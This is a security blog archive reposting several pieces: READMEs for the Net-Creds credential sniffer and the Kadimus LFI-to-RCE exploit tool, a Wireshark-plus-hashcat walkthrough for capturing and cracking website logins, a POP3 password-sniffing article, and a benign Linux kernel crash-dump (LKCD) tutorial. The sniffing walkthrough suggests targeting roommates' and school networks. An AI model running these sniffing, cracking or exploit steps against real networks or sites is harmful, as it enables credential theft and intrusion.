Never Ending Security

It starts all here

Category Archives: Log and Monitoring

Net-Creds – Sniffs Sensitive Data From Interface Or Pcap


Thoroughly sniff passwords and hashes from an interface or pcap file. Concatenates fragmented packets and does not rely on ports for service identification.

Screenshots
Screenie1
Screenie2

Sniffs

  • URLs visited
  • POST loads sent
  • HTTP form logins/passwords
  • HTTP basic auth logins/passwords
  • HTTP searches
  • FTP logins/passwords
  • IRC logins/passwords
  • POP logins/passwords
  • IMAP logins/passwords
  • Telnet logins/passwords
  • SMTP logins/passwords
  • SNMP community string
  • NTLMv1/v2 all supported protocols like HTTP, SMB, LDAP, etc
  • Kerberos

Examples

Auto-detect the interface to sniff

sudo python net-creds.py

Choose eth0 as the interface

sudo python net-creds.py -i eth0

Ignore packets to and from 192.168.0.2

sudo python net-creds.py -f 192.168.0.2

Read from pcap

python net-creds.py -p pcapfile

OSX

Credit to epocs:

sudo easy_install pip
sudo pip install scapy
sudo pip install pcapy
brew install libdnet --with-python
mkdir -p /Users/<username>/Library/Python/2.7/lib/python/site-packages
echo 'import site; site.addsitedir("/usr/local/lib/python2.7/site-packages")' >> /Users/<username>/Library/Python/2.7/lib/python/site-packages/homebrew.pth
sudo pip install pypcap
brew tap brona/iproute2mac
brew install iproute2mac

Then replace line 74 ‘/sbin/ip’ with ‘/usr/local/bin/ip’.


More Info On: https://github.com/DanMcInerney/net-creds


Collecting And Analyzing Linux Kernel Crashes – LKCD


Table of Contents

  1. LKCD – Introduction
    1. How does LKCD work?
  2. LKCD Installation
  3. Basic prerequisites
    1. A Linux operating system configured to use LKCD:
    2. LKCD configuration
  4. LKCD local dump procedure
    1. Required packages
    2. Configuration file
    3. Activate dump process (DUMP_ACTIVE)
    4. Configure the dump device (DUMP_DEVICE)
    5. Configure the dump directory (DUMPDIR)
    6. Configure the dump level (DUMP_LEVEL)
    7. Configure the dump flags (DUMP_FLAGS)
    8. Configure the dump compression level (DUMP_COMPRESS)
    9. Additional settings
    10. Enable core dump capturing
    11. Configure LKCD dump utility to run on startup
  5. LKCD netdump procedure
  6. Configure LKCD netdump server
    1. Required packages
    2. Configuration file
    3. Configure the dump flags (DUMP_FLAGS)
    4. Configure the source port (SOURCE_PORT)
    5. Make sure dump directory is writable for the netdump user
    6. Configure LKCD netdump server to run on startup
    7. Start the server
  7. Configure LKCD client for netdump
    1. Configure the dump device (DUMP_DEV)
    2. Configure the target host IP address (TARGET_HOST)
    3. Configure target host MAC address (ETH_ADDRESS)
    4. Configure target host port (TARGET_PORT)
    5. Configure the source port (SOURCE_PORT)
    6. Enable core dump capturing
    7. Configure LKCD dump utility to run on startup
    8. Start the lkcd-netdump utility
  8. Test functionality
    1. Example of unsuccessful netdump to different network segment
  9. Conclusion
  10. Download

LKCD – Introduction

LKCD stands for Linux Kernel Crash Dump. This tool allows the Linux system to write the contents of its memory when a crash occurs, so that they can be later analyzed for the root cause of the crash.

Ideally, kernels never crash. In reality, the crashes sometimes occur, for whatever reason. It is in the best interest of people using the plagued machines to be able to recover from the problem as quickly as possible while collecting as much data available. The most relevant piece of information for system administrators is the memory dump, taken at the moment of the kernel crash.

How does LKCD work?

You won’t notice LKCD in your daily work. Only when a kernel crash occurs will LKCD kick into action. The kernel crash may result from a kernel panic or an oops or it may be user-triggered. Whatever the case, this is when LKCD begins working, provided it has been configured correctly.

LKCD works in two stages:

Stage 1

This is the stage when the kernel crashes. Or more correctly, a crash is requested, either due to a panic, an oops or a user-triggered dump. When this happens, LKCD kicks into action, provided it has been enabled during the boot sequence.

LKCD copies the contents of the memory to a temporary storage device, called the dump device, which is usually a swap partition, but it may also be a dedicated crash dump collection partition.

After this stage is completed, the system is rebooted.

Stage 2

Once the system boots back online, LKCD is initiated. On different systems, this takes a different startup script. For instance, on a RedHat machine, LKCD is run by the /etc/rc.sysinit script.

Next, LKCD runs two commands. The first command is lkcd config, which we will review more intimately later. This commands prepares the system for the next crash. The second command is lkcd save, which copies the crash dump data from its temporary storage on the dump device to the permanent storage directory, called dump directory.

Along with the dump core, an analysis file and a map file are created and copied; we’ll talk about these separately when we review the crash analysis.

A completion of this two-stage cycle signifies a successful LKCD crash dump.

Here’s an illustration:

Illustration

Some reservations:

LKCD is a somewhat old utility. It may not work well with newer kernels.

All right, now that we know what we’re talking about, let us setup and configure LKCD.

LKCD Installation

You will have to forgive me, but I will NOT demonstrate the LKCD installation. There are several reasons for this untactical evasion on my behalf. I do not expect you to forgive me, but I do hope you will listen to my points:

The LKCD installation requires kernel compilation. This is a lengthy and complex procedure that takes quite a bit of time. It is impossible to explain how LKCD can be installed without showing the entire kernel compilation in detail. For now, I will have to skip this step, but I promise you a tutorial on kernel compilation.

Furthermore, the official LKCD documentation does cover this step. In fact, the supplied IBM tutorial is rather good. However, like most advanced technical papers geared toward highly experienced system administrators, it lacks actual usage examples.

Therefore, I will assume you have a working system compiled with LKCD. So the big question is, what now? How do you use this thing?

This tutorial will try to answer the questions in a linear fashion, explaining how to configure LKCD for local and network dumping of the memory core.

Basic prerequisites

A Linux operating system configured to use LKCD:

Most home users will probably not be able to meet this demand. On the other hand, when you think about it, the collection and analysis of kernel crashes is something you will rarely do at home. For home users, kernel crashes, if they ever occur within the limited scope of desktop usage, are just an occasional nuisance, the open-source world equivalent of the BSOD.

However, if you’re running a business, having your mission-critical systems go down can have a negative business impact. This means that you should be running the “right” kind of operating system in your work environment, configured to suit your needs.

LKCD configuration

LKCD dumps the system memory to a device. This device can be a local partition or a network server. We will discuss both options.

LKCD local dump procedure

Required packages

The host must have the lkcdutils package installed.

Configuration file

The LKCD configuration is located under /etc/sysconfig/dump. Back this up before making any changes! We will have to make several adjustments to this file before we can use LKCD. So let us begin.

Activate dump process (DUMP_ACTIVE)

To be able to use LKCD when crashes occur, you must activate it.

DUMP_ACTIVE=”1″

Configure the dump device (DUMP_DEVICE)

You should be very careful when configuring this directive. If you choose the wrong device, its contents will be overwritten when a crash is saved to it, causing data loss.

Therefore, you must make sure that the DUMPDEV is linked to the correct dump device. In most cases, this will be a swap partition, although you can use any block device whose contents you can afford to overwrite. Accidentally, this section partially explains why the somewhat nebulous and historic requirement for a swap partition to be 1.5x the size of RAM.

What you need to do is define a DUMPDEV device and then link it to a physical block device; for example,/dev/sdb1. Let’s use the LKCD default, which calls the DUMPDEV directive to be set to /dev/vmdump.

DUMPDEV=”/dev/vmdump”

Now, please check that /dev/vmdump points to the right physical device. Example:

ls -l /dev/vmdump
lrwxrwxrwx 1 root root 5 Nov 6 21:53 /dev/vmdump ->/dev/sda5

/dev/sda5 should be your swap partition or a disposable crash partition. If the symbolic link does not exist, LKCD will create one the first time it is run and will link /dev/vmdump to the first swap partition found in the/etc/fstab configuration file. Therefore, if you do not want to use the first swap partition, you will have to manually create a symbolic link for the device configured under the DUMPDEV directive.

Configure the dump directory (DUMPDIR)

This is where the memory images saved previously to the dump device will be copied and kept for later analysis. You should make sure the directory resides on a partition with enough free space to contain the memory image, especially if you’re saving all of it. This means 2GB RAM = 2GB space or more.

In our example, we will use /tmp/dump. The default is set to /var/log/dump.

DUMPDIR=”/tmp/dump”

And a screenshot of the configuration file in action, just to make you feel comfortable:

Dumpdir

Configure the dump level (DUMP_LEVEL)

This directive defines what part of the memory you wish to save. Bear in mind your space restrictions. However, the more you save, the better when it comes to analyzing the crash root cause.

Value
Action
DUMP_NONE (0)
Do nothing, just return if called
DUMP_HEADER (1)
Dump the dump header and first 128K bytes out
DUMP_KERN (2)
Everything in DUMP_HEADER and kernel pages only
DUMP_USED (4)
Everything except kernel free pages
DUMP_ALL (8)
All memory

Configure the dump flags (DUMP_FLAGS)

The flags define what type of dump is going to be saved. For now, you need to know that there are two basic dump device types: local and network.

Flag
Value
0x80000000
Local block device
0x40000000
Network device

Later, we will also use the network option. For now, we need local.

DUMP_FLAGS=”0x80000000″

Configure the dump compression level (DUMP_COMPRESS)

You can keep the dumps uncompressed or use RLE or GZIP to compress them. It’s up to you.

DUMP_COMPRESS=”2″

I would call the settings above the “must-have” set. You must make sure these directives are configured properly for the LKCD to function. Pay attention to the devices you intend to use for saving the crash dumps.

Additional settings

There are several other directives listed in the configuration file. These other directives are all set to the the configuration defaults. You can find a brief explanation on each below. If you find the section inadequate, please email me and I’ll elaborate.

These include:

  • DUMP_SAVE=”1″ – Save the memory image to disk
  • PANIC_TIMEOUT=”5″ – The timeout (in seconds) before a reboot after panic occurs
  • BOUNDS_LIMIT =”10″ – A limit on the number of dumps kept
  • KEXEC_IMAGE=”/boot/vmlinuz” – Defines what kernel image to use after rebooting the system; usually, this will be the same kernel used in normal production
  • KEXEC_CMDLINE=”root console=tty0″ – Defines what parameters the kernel should use when booting after the crash; usually, you won’t have to tamper with this setting – but if you have problems, email me.

In general, we’re ready to use LKCD. So let’s do it.

Enable core dump capturing

The first step we need to do is enable the core dump capturing. In other words, we need to sort of source the configuration file so the LKCD utility can use the values set in it. This is done by running the lkcd configcommand, followed by lkcd query command, which allows you to see the configuration settings.

lkcd config
lkcd query

The output is as follows:

Configured dump device: 0xffffffff
Configured dump flags: KL_DUMP_FLAGS_DISKDUMP
Configured dump level: KL_DUMP_LEVEL_HEADER| >>
>> KL_DUMP_LEVEL_KERN
Configured dump compression method: KL_DUMP_COMPRESS_GZIP

Configure LKCD dump utility to run on startup

To work properly, the LKCD must run on boot. On RedHat machines, you can use the chkconfig utility to achieve this:

chkconfig boot.lkcd on

After the reboot, your machine is ready for crashing … I mean crash dumping. We can begin testing the functionality. However …

Note:

Disk-based dumping may not always succeed in all panic situations. For instance, dumping on hung systems is a best-effort attempt. Furthermore, LKCD does not seem to like the md RAID devices, presenting another problem into the equation. Therefore, to overcome the potentially troublesome situations where you may end up with failed crash collections to local disks, you may want to consider using the network dumping option. Therefore, before we demonstrate the LKCD functionality, we’ll study the netdump option first.

LKCD netdump procedure

Netdump procedure is different from the local dump in having two machines involved in the process. One is the host itself that will suffer kernel crashes and whose memory image we want to collect and analyze. This is the client machine. The only difference from a host configured for local dump is that this machine will use another machine for storage of the crash dump.

The storage machine is the netdump server. Like any server, this host will run a service and listen on a port to incoming network traffic, particular to the LKCD netdump. When crashes are sent, they will be saved to the local block device on the server. Other terms used to describe the relationship between the netdump server and the client is that of source and target, if you will: the client is a source, the machine that generates the information; the server is the target, the destination where the information is sent.

We will begin with the server configuration.

Configure LKCD netdump server

Required packages

The server must have the following two packages installed: lkcdutils and lkcdutils-netdump-server.

Configuration file

The configuration file is the same one, located under /etc/sysconfig/dump. Again, back this file up before making any changes. Next, we will review the changes you need to make in the file for the netdump to work. Most of the directives will remain unchanged, so we’ll take a look only at those specific to netdump procedure, on the server side.

Configure the dump flags (DUMP_FLAGS)

This directive defines what kind of dump is going to be saved to the dump directory. Earlier, we used the local block device flag. Now, we need to change it. The appropriate flag for network dump is 0x40000000.

DUMP_FLAGS=”0x40000000″

Configure the source port (SOURCE_PORT)

This is a new directive we have not seen or used before. This directive defines on which port the server should listen for incoming connections from hosts trying to send LKCD dumps. The default port is 6688. When configured, this directive effectively turns a host into a server – provided the relevant service is running, of course.

SOURCE_PORT=”6688″

Make sure dump directory is writable for the netdump user

This directive is extremely important. It defines the ability of the netdump service to write to the partitions / directories on the server. The netdump server run as the netdump user. We need to make sure this user can write to the desired destination (dump) directory. In our case:

install -o netdump -g dump -m 777 -d /tmp/dump

You may also want to ls the destination directory and check the owner:group. It should be netdump:dump. Example:

ls -ld dump
drwxrwxrwx 3 netdump dump 96 2009-02-20 13:35 dump

You may also try getting away with manually chowning and chmoding the destination to see what happens.

Configure LKCD netdump server to run on startup

We need to configure the netdump service to run on startup. Using chkconfig to demonstrate:

chkconfig netdump-server on

Start the server

Now, we need to start the server and check that it’s running properly. This includes both checking the status and the network connections to see that the server is indeed listening on port 6688.

/etc/init.d/netdump-server start
/etc/init.d/netdump-server status

Likewise:

netstat -tulpen | grep 6688
udp 0 0 0.0.0.0:6688 0.0.0.0:* 479 37910 >>
>> 22791/netdump-server

Everything seems to be in order. This concludes the server-side configurations.

Configure LKCD client for netdump

Client is the machine (which can also be a server of some kind) that we want to collect kernel crashes for. When kernel crashes for whatever reason on this machine, we want it to send its core to the netdump server. Again, we need to edit the /etc/sysconfig/dump configuration file. Once again, most of the directives are identical to previous configurations.

In fact, by changing just a few directives, a host configured to save local dumps can be converted for netdump.

Configure the dump device (DUMP_DEV)

Earlier, we have configured our clients to dump their core to the /dev/vmdump device. However, network dump requires an active network interface. There are other considerations in place as well, but we will review them later.

DUMP_DEV=”eth0″

Configure the target host IP address (TARGET_HOST)

The target host is the netdump server, as mentioned before. In our case, it’s the server machine we configured above. To configure this directive – and the one after – we need to go back to our server and collect some information, the output from the ifconfig command, listing the IP address and the MAC address. For example:

inet addr:192.168.1.3
HWaddr 00:12:1b:40:c7:63

Therefore, our target host directive is set to:

TARGET_HOST=”192.168.1.3″

Alternatively, it is also possible to use hostnames, but this requires the use of hosts file, DNS, NIS or other name resolution mechanisms properly set and working.

Configure target host MAC address (ETH_ADDRESS)

If this directive is not set, the LKCD will send a broadcast to the entire neighborhood, possibly inducing a traffic load. In our case, we need to set this directive to the MAC address of our server:

ETH_ADDRESS=”00:12:1b:40:c7:63

Limitation:

Please note that the netdump functionality is currently limited to the same subnet that the server runs on. In our case, this means /24 subnet. We’ll see an example for this shortly.

Configure target host port (TARGET_PORT)

We need to set this option to what we configured earlier for our server. This means port 6688.

TARGET_PORT=”6688″

Configure the source port (SOURCE_PORT)

Lastly, we need to configure the port the client will use to send dumps over network. Again, the default is 6688.

SOURCE_PORT=”6688″

And image example:

Source port

This concludes the changes to the configuration file.

Enable core dump capturing

Perform the same steps we did during the local dump configuration: run the lkcd config and lkcd querycommands and check the setup.

lkcd config
lkcd query

The output is as follows:

Configured dump device: 0xffffffff
Configured dump flags: KL_DUMP_FLAGS_NETDUMP
Configured dump level: KL_DUMP_LEVEL_HEADER| >>
>> KL_DUMP_LEVEL_KERN
Configured dump compression method: KL_DUMP_COMPRESS_GZIP

Configure LKCD dump utility to run on startup

Once again, the usual procedure:

chkconfig lkcd-netdump on

Start the lkcd-netdump utility

Start the utility by running the /etc/init.d/lkcd-netdump script.

/etc/init.d/lkcd-netdump start

Watch the console for successful configuration message. Something like this:

Success

This means you have successfully configured the client and can proceed to test the functionality.

Test functionality

To test the functionality, we will force a panic on our kernel. This is something you should be careful about doing, especially on your production systems. Make sure you backup all critical data before experimenting.

To be able to create panic, you will have to enable the System Request (SysRq) functionality on the desired clients, if it has not already been set:

echo 1 > /proc/sys/kernel/sysrq

And then force the panic:

echo c > /proc/sysrq-trigger

Watch the console. The system should reboot after a while, indicating a successful recovery from the panic. Furthermore, you need to check the dump directory on the netdump server for the newly created core, indicating a successful network dump. Indeed, checking the destination directory, we can see the memory core was successfully saved. And now we can proceed to analyze it.

Worked

Example of unsuccessful netdump to different network segment

As mentioned before, the netdump functionality seems limited to the same subnet. Trying to send the dump to a machine on a different subnet results in an error (see screenshot below). I have tested this functionality for several different subnets, without success. If anyone has a solution, please email it to me.

Here’s a screenshot:

Failure

Conclusion

LKCD is a very useful application, although it has its limitations.

On one hand, it provides with the critical ability to perform indepth forensics on crashed systems post-mortem. The netdump functionality is particularly useful in allowing system administrators to save memory images after kernel crashes without relying on the internal hard disk space or the hard disk configuration. This can be particularly useful for machines with very large RAM, when dumping the entire contents of the memory to local partitions might be problematic. Furthermore, the netdump functionality allows LKCD to be used on hosts configured with RAID, since LKCD is unable to work with md partitions, overcoming the problem.

However, the limitation to use within the same network segment severely limits the ability to mass-deploy the netdump in large environments. It would be extremely useful if a workaround or patch were available so that centralized netdump servers can be used without relying on specific network topography.

Lastly, LKCD is a somewhat old utility and might not work well on the modern kernels. In general, it is fairly safe to say it has been replaced by the more flexible Kdump, which we will review in the next article

Website Password & User Credentials Sniffing/Hacking Using WireShark


Did you knew every time you fill in your username and password on a website and press ENTER, you are sending your password. Well, of course you know that. How else you’re going to authenticate yourself to the website?? But, (yes, there’s a small BUT here).. when a website allows you to authenticate using HTTP (PlainText), it is very simple to capture that traffic and later analyze that from any machine over LAN (and even Internet). That bring us to this website password hacking guide that works on any site that is using HTTP protocol for authentication. Well, to do it over Internet, you need to be able to sit on a Gateway or central HUB (BGP routers would do – if you go access and the traffic is routed via that).

But to do it from a LAN is easy and at the same time makes you wonder, how insecure HTTP really is. You could be doing to to your roommate, Work Network or even School, College, University network assuming the network allows broadcast traffic and your LAN card can be set to promiscuous mode.

So lets try this on a simple website. I will hide part of the website name (just for the fact that they are nice people and I respect their privacy.). For the sake of this guide, I will just show everything done on a single machine. As for you, try it between two VirtualBox/VMWare/Physical machines.

p.s. Note that some routers doesn’t broadcast traffic, so it might fail for those particular ones.

Step 1: Start Wireshark and capture traffic

In Kali Linux you can start Wireshark by going to

Application > Kali Linux > Top 10 Security Tools > Wireshark

In Wireshark go to Capture > Interface and tick the interface that applies to you. In my case, I am using a Wireless USB card, so I’ve selected wlan0.

Website Password hacking using WireShark - blackMORE Ops - 1

Ideally you could just press Start button here and Wireshark will start capturing traffic. In case you missed this, you can always capture traffic by going back to Capture > Interface > Start

Website Password hacking using WireShark - blackMORE Ops - 2

Step 2: Filter captured traffic for POST data

At this point Wireshark is listening to all network traffic and capturing them. I opened a browser and signed in a website using my username and password. When the authentication process was complete and I was logged in, I went back and stopped the capture in Wireshark.

Usually you see a lot of data in Wireshark. However are are only interested on POST data.

Why POST only?

Because when you type in your username, password and press the Login button, it generates a a POSTmethod (in short – you’re sending data to the remote server).

To filter all traffic and locate POST data, type in the following in the filter section

http.request.method == “POST”

See screenshot below. It is showing 1 POST event.

Website Password hacking using WireShark - blackMORE Ops - 3

Step 3: Analyze POST data for username and password

Now right click on that line and select Follow TCP Steam

Website Password hacking using WireShark - blackMORE Ops - 4

This will open a new Window that contains something like this:

HTTP/1.1 302 Found 
Date: Mon, 10 Nov 2014 23:52:21 GMT 
Server: Apache/2.2.15 (CentOS) 
X-Powered-By: PHP/5.3.3 
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" 
Set-Cookie: non=non; expires=Thu, 07-Nov-2024 23:52:21 GMT; path=/ 
Set-Cookie: password=e4b7c855be6e3d4307b8d6ba4cd4ab91; expires=Thu, 07-Nov-2024 23:52:21 GMT; path=/ 
Set-Cookie: scifuser=sampleuser; expires=Thu, 07-Nov-2024 23:52:21 GMT; path=/ 
Location: loggedin.php 
Content-Length: 0 
Connection: close 
Content-Type: text/html; charset=UTF-8

I’ve highlighted the user name and password field.

So in this case,

  1. username: sampleuser
  2. password: e4b7c855be6e3d4307b8d6ba4cd4ab91

But hang on, e4b7c855be6e3d4307b8d6ba4cd4ab91 can’t be a real password. It must be a hash value.

Note that some website’s doesn’t hash password’s at all even during sign on. For those, you’ve already got the username and password. In this case, let’s go bit far and identify this hash value

Step 4: Identify hash type

I will use hash-identifier to find out which type of hash is that. Open terminal and type in hash-identifier and paste the hash value. hash-identifier will give you possible matches.

See screenshot below:

Website Password hacking using WireShark - blackMORE Ops - 6

Now one thing for sure, we know it’s not a Domain Cached Credential. So it must be a MD5 hash value.

I can crack that using hashcat or cudahashcat.

Step 5: Cracking MD5 hashed password

I can easily crack this simple password using hashcat or similar softwares.

root@kali:~# hashcat -m 0 -a 0 /root/wireshark-hash.lf /root/rockyou.txt
(or)
root@kali:~# cudahashcat -m 0 -a 0 /root/wireshark-hash.lf /root/rockyou.txt
(or)
root@kali:~# cudahashcat32 -m 0 -a 0 /root/wireshark-hash.lf /root/rockyou.txt
(or)
root@kali:~# cudahashcat64 -m 0 -a 0 /root/wireshark-hash.lf /root/rockyou.txt

Because this was a simple password that existed in my password list, hashcat cracked it very easily.

Cracking password hashes

Website Password hacking using WireShark - blackMORE Ops - 7

Out final outcome looks like this:

  1. username: sampleuser
  2. password: e4b7c855be6e3d4307b8d6ba4cd4ab91:simplepassword

Conclusion

Well, to be honest it’s not possible for every website owner to implement SSL to secure password, some SSL’s cost you upto 1500$ per URL (well, you can get 10$ ones too but I personally never used those so I can’t really comment). But the least website owners (public ones where anyone can register) should do is to implement hashing during login-procedures. In that way, at least the password is hashed and that adds one more hurdle for someone from hacking website password easily. Actually it’s a big one as SSL encryption (theoretically) can take 100+years even with the best SuperComputer of today.

Enjoy and use this guide responsibly. Please Share and RT. Thanks.

Traffic Analysis and Capture Passwords


ABSTRACT

It is known that Wireshark is a powerful tool that goes far beyond a simple sniffer. What many do not know is that there are several ways to harness the potential of this tool, readers, this article will introduce. Let us learn to sniff the network effectively, create filters to find only the information we want, see it as a black hat would use this tool to steal passwords and finally, how to use Wireshark to diagnose network problems or if a firewall is blocking packets correctly.

INTRODUCTION

Your password is hard to be broken? Has many characters and you trade with a certain regularity and one day you’re surprised to receive allegations of invasion. Evidence indicates that the invasions third party accounts departed from your account and you have no idea what is happening. That is, someone may have made use of your account and performed such acts as you. How could this have happened? A strong possibility is that you have been the victim of an attack of “sniffer”.

UNDESTAND THE MAIN CONCEPT

What are Sniffers? Well… Are very useful software, so great is the use of them, even the IDS systems are made based sniffers. A sniffer is a program that can capture all traffic passing in a segment of a network.

Programs that allow you to monitor network activity recording names (username and password) each time they access other computers on the network.

These programs are monitoring (“sniffing”) network traffic to capture access to network services, such as remote mail service (IMAP, POP), remote access (telnet, rlogin, etc.), file transfer (FTP) etc.. Accesses made, captured packets. Always aiming to get identification for access the user’s account.

When we called the HUB computer and send information from one computer to another, in reality these data are for all ports of the HUB, and therefore for all machines. It turns out that only the machine on which the information was intended to send the operating system.

If a sniffer was running on other computers, even without these systems send the information travels there for the operating system, the sniffer will intercede at the network layer, data capturing and displaying them to the user, unfriendly way. Generally the data are organized by type of protocol (TCP, UDP, FTP, ICMP, etc…) and each package shown may have read your content.

YOUR PASSWORD CAN BE CAPTURED BY SNIFFERS

Many local area networks (LANs) are configured sharing the same Ethernet segment. Virtually any computer of the network can run a “sniffer” program to “steal” users passwords. “Sniffers” work monitoring the flow of communication between computers on the network to find out when someone uses the network services previously mentioned. Each of these services uses a protocol that defines how a session is established, such as your account is identified and authenticated and how to use the service.

To have access to these services, you first have to have a “log in”. Is the login sequence – the part of these authentication protocols, which occurs at the beginning of each session – the “sniffers” are concerned, because it is this part that is your password. Therefore, it is the only filter “strings” keys that the password is obtained.

STEP BY STEP

Currently, almost all environments using switches and not hubs, which makes sniffing a little more difficult because the switches do not send the data to all ports as a hub does, it sends directly to the port where the host destination, so if you try to sniff a network switch you will only hear what is broadcast, or its own connection. To be able to hear everything without being the gateway of the network, an ARP spoof attack is necessary, or burst the CAM table of the switch.

Basic Usage

Now let’s put our hands dirty: I’m assuming you already have the program installed, if you do not download. When starting Wireshark, the displayed screen will look something like Figure 1:

Figure 1) Wireshark.

Before you can start capturing packets, we have to define which interface will “listen” to the traffic. Click Capture > Interfaces

Figure 2) Interfaces.

From there, a new window will appear with the list of automatically detected interfaces, simply select the desired interface by clicking the box next to the name of the interface, as in figure 3:

Figure 3) Capture Interfaces.

If you click Start, it will begin automatically captures. You can only select the interface and only then start the capture if necessary.

When the capture process starts, you will see several packets traversing the screen Wireshark (varying according to the traffic of your machine / network). Will look something like the figure 4:

Figure 4) Capturing.

To stop the capture, simply click the button, “Stop the running live capture”.

Figure 5) Stop.

It is important to remember that you must take care if your network is busy, the data stream may even lock your machine, then it is not advisable to leave the Wireshark capture for a long time, as we will see, we will leave it running only during the process debug a connection. The greater the amount of packets, the longer it takes to apply a filter, find a package, etc.

With this we have the basics of the program, we can set the capture interface, start and stop the capture. The next step is to identify what interests among many packages. For this, we will start using filters.

Using Filters

There is a plethora of possible filters, but at this moment we will see just how to filter by IP address, port and protocol.

The filters can be constructed by clicking on “Filter“, then selecting the desired filter (there is a short list of pre-defined filters), or by typing directly into the text box. After you create your filter, just click “Apply“, if you wanted to see the entire list of packages again just click “Clear“, this will remove the filter previously applied.

Figure 6) Filter.

I will use a small filter list as an example:

Figure 7) Example by Rafael Souza (RHA Infosec).

It is also possible to group the filters, for example:

ip.src == 10.10.10.1 && tcp.dstport==80 OR ip.src == 10.10.10.1 and tcp.dstport==80

Source address 10.10.10.1

And destination port 80

CAPTURING PASSWORDS

Now we will see how you can capture passwords easily, just by listening to traffic. For this example we will use the POP3 protocol, which sends the data in clear text over the network. To do this, start capturing packets normally and start a session with your server pop3 email. If you use a safer as imaps or pop3s and I just wanted to see the functioning of the mechanism, protocol is possible to connect via telnet pop3 without having to add / modify your account, simply run the following:

telnet serveremail.com 110 user user@rhainfosec.com pass rhainfosecpasswd

Now stop the capture, filter and put “pop” and then click “Apply“. That done, you see only the packets of pop3 connection. Now click on any of them right, and then click “Follow TCP Stream“.

Figure 8) POP3.

With this he will open a new window with the entire contents of the ASCII connection. As the pop3 protocol sends everything in plain text, you can see all the commands executed, including the password.

Figure 9) Pass.

This can be transported to any connection in plain text, such as ftp, telnet, http, etc.. Just to let you change the filter and examine the contents of the connection.

Importing External Captures

Usually in servers, there is no graphical environment installed and with that you cannot use Wireshark directly. If you want to analyze traffic on this server and you cannot install Wireshark, or if you do not have to capture this traffic elsewhere, the best one can do is write traffic with tcpdump locally and then copy this dump to a machine with Wireshark for a more detailed analysis is made.

We will capture everything that comes or goes to the host 10.10.10.1 with destination port 80 and save content in capturerafaelsouzarhainfosec.pcap file from the local folder where the command was executed. Run the server:

tcpdump -i eth0 host 10.10.10.1 and dst port 80 -w capturerafaelsouzarhainfosec.pcap   Once you’re finished capturing, simply use CTRL + C to copy the file to the machine Wireshark capture and import by clicking on File -> Import. Once imported, you can use the program normally as if the capture had occurred locally.

EVOLUTION OF THINKING

Why steal your password?

There are various reasons that lead people to steal passwords from simply to annoy someone (sending email as you) up to perform illegal activities (invasion on other computers, theft of information, etc.) An attractive to crackers is the ability to use the identity of others in these activities.

One of the main reasons that attackers try to break systems and install “sniffers” is able to quickly capture the maximum possible accounts. Thus, the more accounts this attacker has , the easier it is to hide your stash.

How can you protect yourself?

Do not be thinking that “sniffers” can make all the insecure Internet. Not so. You need to be aware of where the risk is , when you’re at risk and what to do to be safe .

When you have your stolen credit card or suspect that someone may be using it improperly, you cancel the card and asks another. Likewise, as passwords can be stolen, it’s critical that you replace regularly. This precaution limited the amount of time that a stolen password can be used by an attacker.

Never share your password with others. This sharing makes it difficult to know where your password is being used (exposed) and is harder to detect unauthorized use.

Never give your password to anyone claiming access your account needs to fix some problem or want to investigate a breach of the system. This trick is one of the most effective methods of hacking, known as “social engineering.”

Use networks you can trust

Another aspect you should take into consideration is what network you can trust and which cannot. If you’re traveling and need to access their computers remotely organization. For example, pick any file in your home directory and you have available is a “LanHouse” or network of another organization . Are you sure you can trust the network?

If you have no alternative for secure remote access and only have available resources such as telnet, for example, you can “mitigate” this effect by changing the password at the end of each session. Remember that only the first packet (200-300 bytes)of each session carry information from your “login”. Therefore, to always change your password before logging out, this will not be captured and password before it was exposed to the network is no longer valid. Of course it is possible to capture everything going across the network, but has no intention of attacking fill the file system quickly and so easily discovered.

Why networks remain vulnerable to “sniffers” long?

There are several reasons and there is no quick solution to the problem.

Part of the problem is that companies tend to invest in more new features than add security. New security features can leave the most difficult systems to configure and less convenient to use.

Another part of the problem is related to added costs for Ethernet switches, hubs, network interfaces that do not support the particular “promiscuous” that sniffers can use.

CONCLUSION

The question that remains is how can we protect ourselves from this threat…

  • ü Network cards that cannot be put into “promiscuous” mode. Thus, computers cannot be mastered and transformed into “sniffers”.
  • ü Typically, the Ethernet interface only passes packets to the highest level protocol that are intended for local machine. This interface into promiscuous mode allows all packets are accepted and passed to the higher layer of the protocol stack. This allows the selection you want.
  • ü Packages that encrypt data in transit over the network, thus avoiding to flow passwords “in the clear”.

I would remind you that the safest is to adopt and encourage the use of software which enable remote access encrypted sessions, help much to make your environment more secure.

One fairly common encryption technology currently in secure communication between remote machines SSH (Secure Shell). SSH is available for different platforms. Its use does not prevent the password captured, but as this is not encrypted serve to the attacker. SSH negotiates connections using RSA algorithm. Once the service is authenticated, all subsequent traffic is encrypted using IDEA technology. This type of encryption is very strong.

In the future, security will increasingly intrinsic to the systems and infrastructure networks. No use having all the “apparatus” of security you need, but do not use them. Security is not something that can be completely secure. Remember, no one is 100% secure.

Kadimus For LFI / RFI Scan And Exploit Tool


Kadimus

LFI Scan & Exploit Tool

Kadimus is a tool to check sites to lfi vulnerability , and also exploit it

Features:

  • Check all url parameters
  • /var/log/auth.log RCE
  • /proc/self/environ RCE
  • php://input RCE
  • data://text RCE
  • Source code disclosure
  • Multi thread scanner
  • Command shell interface through HTTP Request
  • Proxy support (socks4://, socks4a://, socks5:// ,socks5h:// and http://)
  • Proxy socks5 support for bind connections

Compile:

$ git clone https://github.com/P0cL4bs/Kadimus.git
$ cd Kadimus

You can run the configure file:

./configure

Or follow this steps:

Installing libcurl:

  • CentOS/Fedora
# yum install libcurl-devel
  • Debian based
# apt-get install libcurl4-openssl-dev

Installing libpcre:

  • CentOS/Fedora
# yum install pcre-devel
  • Debian based
# apt-get install libpcre3-dev

Installing libssh:

  • CentOS/Fedora
# yum install libssh-devel
  • Debian based
# apt-get install libssh-dev

And finally:

$ make

Options:

  -h, --help                    Display this help menu

  Request:
    -B, --cookie STRING         Set custom HTTP Cookie header
    -A, --user-agent STRING     User-Agent to send to server
    --connect-timeout SECONDS   Maximum time allowed for connection
    --retry-times NUMBER        number of times to retry if connection fails
    --proxy STRING              Proxy to connect, syntax: protocol://hostname:port

  Scanner:
    -u, --url STRING            Single URI to scan
    -U, --url-list FILE         File contains URIs to scan
    -o, --output FILE           File to save output results
    --threads NUMBER            Number of threads (2..1000)

  Explotation:
    -t, --target STRING         Vulnerable Target to exploit
    --injec-at STRING           Parameter name to inject exploit
                                (only need with RCE data and source disclosure)

  RCE:
    -X, --rce-technique=TECH    LFI to RCE technique to use
